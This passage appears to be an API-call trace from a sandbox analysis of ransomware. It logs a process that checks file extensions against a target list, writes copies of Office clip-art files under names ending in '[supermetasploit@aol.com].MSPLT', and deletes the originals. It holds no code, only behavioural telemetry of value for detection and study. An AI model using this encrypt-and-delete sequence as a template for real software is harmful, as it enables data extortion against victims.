[0312.297] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.297] lstrlenW (lpString=".zip") returned 4 [0312.297] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.297] lstrlenW (lpString=".rar") returned 4 [0312.297] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.297] lstrlenW (lpString=".bz2") returned 4 [0312.297] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.297] lstrlenW (lpString=".7z") returned 3 [0312.297] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.298] lstrlenW (lpString=".dbf") returned 4 [0312.298] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.298] lstrlenW (lpString=".1cd") returned 4 [0312.298] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.298] lstrlenW (lpString=".jpg") returned 4 [0312.298] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.303] lstrlenW (lpString=".doc") returned 4 [0312.304] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.304] lstrlenW (lpString=".docx") returned 5 [0312.304] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.304] lstrlenW (lpString=".pdf") returned 4 [0312.304] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.304] lstrlenW (lpString=".xls") returned 4 [0312.304] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.304] lstrlenW (lpString=".xlsx") returned 5 [0312.304] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.304] lstrlenW (lpString=".ppt") returned 4 [0312.304] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.304] lstrlenW (lpString=".zip") returned 4 [0312.304] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.304] lstrlenW (lpString=".rar") returned 4 [0312.304] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.304] lstrlenW (lpString=".bz2") returned 4 [0312.304] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.305] lstrlenW (lpString=".7z") returned 3 [0312.305] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.305] lstrlenW (lpString=".dbf") returned 4 [0312.325] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.325] lstrlenW (lpString=".1cd") returned 4 [0312.325] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 68 [0312.326] lstrlenW (lpString=".jpg") returned 4 [0312.326] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.326] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.326] lstrlenW (lpString="BS00438_.WMF") returned 12 [0312.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0312.337] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=1212) returned 1 [0312.338] CloseHandle (hObject=0x528) returned 1 [0312.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf")) returned 0x220 [0312.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0312.339] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.339] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0312.340] GetLastError () returned 0x0 [0312.340] ReadFile (in: hFile=0x528, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x4bc, lpOverlapped=0x0) returned 1 [0312.490] WriteFile (in: hFile=0x520, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x4c0, lpOverlapped=0x0) returned 1 [0312.492] ReadFile (in: hFile=0x528, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.492] WriteFile (in: hFile=0x520, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0312.492] SetEndOfFile (hFile=0x520) returned 1 [0312.526] CloseHandle (hObject=0x520) returned 1 [0312.528] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.528] SetEndOfFile (hFile=0x528) returned 1 [0312.543] CloseHandle (hObject=0x528) returned 1 [0312.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf")) returned 1 [0312.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.546] lstrlenW (lpString=".doc") returned 4 [0312.546] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.546] lstrlenW (lpString=".docx") returned 5 [0312.546] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.546] lstrlenW (lpString=".pdf") returned 4 [0312.546] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.546] lstrlenW (lpString=".xls") returned 4 [0312.546] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.546] lstrlenW (lpString=".xlsx") returned 5 [0312.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.546] lstrlenW (lpString=".ppt") returned 4 [0312.546] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.546] lstrlenW (lpString=".zip") returned 4 [0312.546] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.546] lstrlenW (lpString=".rar") returned 4 [0312.546] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.546] lstrlenW (lpString=".bz2") returned 4 [0312.547] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.547] lstrlenW (lpString=".7z") returned 3 [0312.547] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.547] lstrlenW (lpString=".dbf") returned 4 [0312.547] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.547] lstrlenW (lpString=".1cd") returned 4 [0312.547] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.547] lstrlenW (lpString=".jpg") returned 4 [0312.547] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.547] lstrlenW (lpString=".doc") returned 4 [0312.547] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.547] lstrlenW (lpString=".docx") returned 5 [0312.547] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.547] lstrlenW (lpString=".pdf") returned 4 [0312.547] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.548] lstrlenW (lpString=".xls") returned 4 [0312.548] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.548] lstrlenW (lpString=".xlsx") returned 5 [0312.548] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.548] lstrlenW (lpString=".ppt") returned 4 [0312.548] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.548] lstrlenW (lpString=".zip") returned 4 [0312.548] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.548] lstrlenW (lpString=".rar") returned 4 [0312.548] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.548] lstrlenW (lpString=".bz2") returned 4 [0312.548] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.548] lstrlenW (lpString=".7z") returned 3 [0312.548] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.548] lstrlenW (lpString=".dbf") returned 4 [0312.548] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.548] lstrlenW (lpString=".1cd") returned 4 [0312.548] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0312.549] lstrlenW (lpString=".jpg") returned 4 [0312.549] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.549] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.549] lstrlenW (lpString="BS00442_.WMF") returned 12 [0312.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0312.550] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2488) returned 1 [0312.550] CloseHandle (hObject=0x528) returned 1 [0312.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf")) returned 0x220 [0312.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0312.551] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.551] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0312.637] GetLastError () returned 0x0 [0312.637] ReadFile (in: hFile=0x528, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x9b8, lpOverlapped=0x0) returned 1 [0313.211] WriteFile (in: hFile=0x520, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x9c0, lpOverlapped=0x0) returned 1 [0313.213] ReadFile (in: hFile=0x528, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0313.213] WriteFile (in: hFile=0x520, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0313.214] SetEndOfFile (hFile=0x520) returned 1 [0313.245] CloseHandle (hObject=0x520) returned 1 [0313.273] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.274] SetEndOfFile (hFile=0x528) returned 1 [0313.280] CloseHandle (hObject=0x528) returned 1 [0313.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0313.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf")) returned 1 [0313.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.283] lstrlenW (lpString=".doc") returned 4 [0313.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0313.283] lstrlenW (lpString=".docx") returned 5 [0313.283] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0313.283] lstrlenW (lpString=".pdf") returned 4 [0313.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0313.283] lstrlenW (lpString=".xls") returned 4 [0313.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0313.283] lstrlenW (lpString=".xlsx") returned 5 [0313.284] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0313.284] lstrlenW (lpString=".ppt") returned 4 [0313.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0313.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.284] lstrlenW (lpString=".zip") returned 4 [0313.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0313.284] lstrlenW (lpString=".rar") returned 4 [0313.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0313.284] lstrlenW (lpString=".bz2") returned 4 [0313.284] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0313.284] lstrlenW (lpString=".7z") returned 3 [0313.284] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0313.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.284] lstrlenW (lpString=".dbf") returned 4 [0313.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0313.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.284] lstrlenW (lpString=".1cd") returned 4 [0313.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0313.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.285] lstrlenW (lpString=".jpg") returned 4 [0313.285] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0313.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.285] lstrlenW (lpString=".doc") returned 4 [0313.285] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0313.285] lstrlenW (lpString=".docx") returned 5 [0313.285] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0313.285] lstrlenW (lpString=".pdf") returned 4 [0313.285] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0313.285] lstrlenW (lpString=".xls") returned 4 [0313.285] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0313.285] lstrlenW (lpString=".xlsx") returned 5 [0313.285] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0313.285] lstrlenW (lpString=".ppt") returned 4 [0313.285] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0313.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.285] lstrlenW (lpString=".zip") returned 4 [0313.285] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0313.285] lstrlenW (lpString=".rar") returned 4 [0313.285] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0313.286] lstrlenW (lpString=".bz2") returned 4 [0313.286] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0313.286] lstrlenW (lpString=".7z") returned 3 [0313.286] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0313.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.286] lstrlenW (lpString=".dbf") returned 4 [0313.286] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0313.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.286] lstrlenW (lpString=".1cd") returned 4 [0313.286] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0313.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0313.286] lstrlenW (lpString=".jpg") returned 4 [0313.286] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0313.286] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0313.286] lstrlenW (lpString="BS00445_.WMF") returned 12 [0313.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0313.470] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3796) returned 1 [0313.473] CloseHandle (hObject=0x54c) returned 1 [0313.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf")) returned 0x220 [0313.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0313.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0313.524] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.524] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0313.529] GetLastError () returned 0x0 [0313.529] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xed4, lpOverlapped=0x0) returned 1 [0313.538] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xee0, lpOverlapped=0x0) returned 1 [0313.540] ReadFile (in: hFile=0x54c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0313.541] WriteFile (in: hFile=0x488, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0313.541] SetEndOfFile (hFile=0x488) returned 1 [0313.542] CloseHandle (hObject=0x488) returned 1 [0313.548] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.548] SetEndOfFile (hFile=0x54c) returned 1 [0313.553] CloseHandle (hObject=0x54c) returned 1 [0313.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0313.554] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf")) returned 1 [0313.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.555] lstrlenW (lpString=".doc") returned 4 [0313.556] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0313.556] lstrlenW (lpString=".docx") returned 5 [0313.556] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0313.556] lstrlenW (lpString=".pdf") returned 4 [0313.556] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0313.556] lstrlenW (lpString=".xls") returned 4 [0313.556] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0313.556] lstrlenW (lpString=".xlsx") returned 5 [0313.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0313.556] lstrlenW (lpString=".ppt") returned 4 [0313.556] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0313.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 68 [0313.556] lstrlenW (lpString=".zip") returned 4 [0313.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0313.556] lstrlenW (lpString=".rar") returned 4 [0313.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0313.556] lstrlenW (lpString=".bz2") returned 4 [0313.556] lstrcmpiW 